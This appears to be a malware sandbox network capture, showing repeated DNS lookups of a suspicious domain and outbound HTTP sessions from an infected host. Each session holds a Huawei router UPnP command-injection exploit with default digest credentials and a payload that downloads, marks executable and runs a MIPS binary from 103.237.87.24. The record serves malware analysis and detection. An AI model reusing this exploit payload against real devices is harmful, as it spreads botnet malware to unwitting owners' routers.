                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  May 24, 2024 10:58:53.036673069 CEST192.168.2.138.8.8.80xd15eStandard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:04.279160976 CEST192.168.2.138.8.8.80xfcf9Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:09.204201937 CEST192.168.2.138.8.8.80x1fd7Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:12.101465940 CEST192.168.2.138.8.8.80x192cStandard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:21.319490910 CEST192.168.2.138.8.8.80x811Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:23.524034977 CEST192.168.2.138.8.8.80x566aStandard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:30.722345114 CEST192.168.2.138.8.8.80x28d3Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:40.634290934 CEST192.168.2.138.8.8.80x88f0Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:49.852698088 CEST192.168.2.138.8.8.80x2772Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:57.792654037 CEST192.168.2.138.8.8.80xafe8Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:01.674947977 CEST192.168.2.138.8.8.80xe7d4Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:10.724592924 CEST192.168.2.138.8.8.80x3b96Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:12.663851976 CEST192.168.2.138.8.8.80x3eb8Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:20.599960089 CEST192.168.2.138.8.8.80x9ec2Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:31.619256973 CEST192.168.2.138.8.8.80x59cbStandard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:36.654916048 CEST192.168.2.138.8.8.80x4948Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:41.584775925 CEST192.168.2.138.8.8.80xc000Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:51.480364084 CEST192.168.2.138.8.8.80xbcfbStandard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:57.445849895 CEST192.168.2.138.8.8.80x8990Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  May 24, 2024 10:58:53.352910042 CEST8.8.8.8192.168.2.130xd15eNo error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:04.288491964 CEST8.8.8.8192.168.2.130xfcf9No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:09.211388111 CEST8.8.8.8192.168.2.130x1fd7No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:12.402940989 CEST8.8.8.8192.168.2.130x192cNo error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:21.646716118 CEST8.8.8.8192.168.2.130x811No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:23.825782061 CEST8.8.8.8192.168.2.130x566aNo error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:30.731395006 CEST8.8.8.8192.168.2.130x28d3No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:40.961975098 CEST8.8.8.8192.168.2.130x88f0No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:49.906718969 CEST8.8.8.8192.168.2.130x2772No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 10:59:57.800147057 CEST8.8.8.8192.168.2.130xafe8No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:01.682848930 CEST8.8.8.8192.168.2.130xe7d4No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:10.732356071 CEST8.8.8.8192.168.2.130x3b96No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:12.712671041 CEST8.8.8.8192.168.2.130x3eb8No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:20.607815981 CEST8.8.8.8192.168.2.130x9ec2No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:31.635085106 CEST8.8.8.8192.168.2.130x59cbNo error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:36.662722111 CEST8.8.8.8192.168.2.130x4948No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:41.592669010 CEST8.8.8.8192.168.2.130xc000No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:51.522159100 CEST8.8.8.8192.168.2.130xbcfbNo error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  May 24, 2024 11:00:57.456350088 CEST8.8.8.8192.168.2.130x8990No error (0)ok.ditmemost.click103.237.87.24A (IP address)IN (0x0001)false
                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  0192.168.2.134677887.244.2.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055296898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.1354054197.197.97.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055299044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2192.168.2.1343518208.124.181.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055309057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192.168.2.1336604157.168.109.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055309057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192.168.2.1337266109.1.27.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055319071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192.168.2.133992041.110.163.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055340052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6192.168.2.1349384157.244.154.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055342913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192.168.2.136029441.233.7.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055341005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8192.168.2.1349284141.222.161.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055354118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
